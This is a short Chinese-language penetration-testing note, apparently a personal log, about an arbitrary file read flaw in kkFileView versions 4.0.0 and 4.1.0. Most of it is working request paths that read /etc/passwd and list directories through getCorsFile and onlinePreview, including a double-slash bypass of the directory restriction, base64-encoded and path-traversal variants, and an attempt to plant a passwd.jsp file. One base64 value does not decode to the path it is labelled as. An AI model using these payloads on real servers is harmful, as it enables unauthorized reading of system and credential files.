一:记录最近遇到的问题。
目标靶机服务器存在kkFileView 版本为4.0.0版本
历史版本存在任意文件读取漏洞:
/file-preview/getCorsFile?urlPath=file:///etc/passwd
/getCorsFile?urlPath=file:///etc/passwd
/file-preview/onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO (filie:///etc/passwd)
/onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO (filie:///etc/passwd)
二:突破
低版本的/file-preview/getCorsFile?urlPath=file:///etc/passwd直接可以读文件和
列目录/file-preview/getCorsFile?urlPath=file:///
遇到的版本
/file-preview/getCorsFile?urlPath=file:///etc/passwd 提示限制目录预览。
后面突破:
/file-preview//getCorsFile?urlPath=file:///etc/passwd 成功读取到内容,
/file-preview//getCorsFile?urlPath=file:/// 也能成功列目录
三:延伸
今天又遇到个4.1.0 版本 也提示提示限制目录运行。
路径加一个斜杠/,成功突破目录限制预览,但是暴500错误,
file:///etc/passwd 也是 500
base64也是 500。
应该目录限制是突破了,这个500错误暂时不清楚情况。
好像全站不支持脚本运行,附件上传默认上传到tmp目录,可以上传/etc/passwd.jsp 然后预览会在 tmp上级目录上传一个passwd.jsp,但是继续跳转目录不能成功。
思路3:/file-preview/getCorsFile?urlPath=file:///etc/passwd
思路4:/file-preview//getCorsFile?urlPath=file:///etc/passwd //突破限制目录
思路5:/file-preview//onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO //base64
思路6:/file-preview//onlinePreview?url=..<details>/..<details>/..<details>etc/passwd
.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd
思路8:/file-preview//onlinePreview?url=file:///etc/passwd#a.txt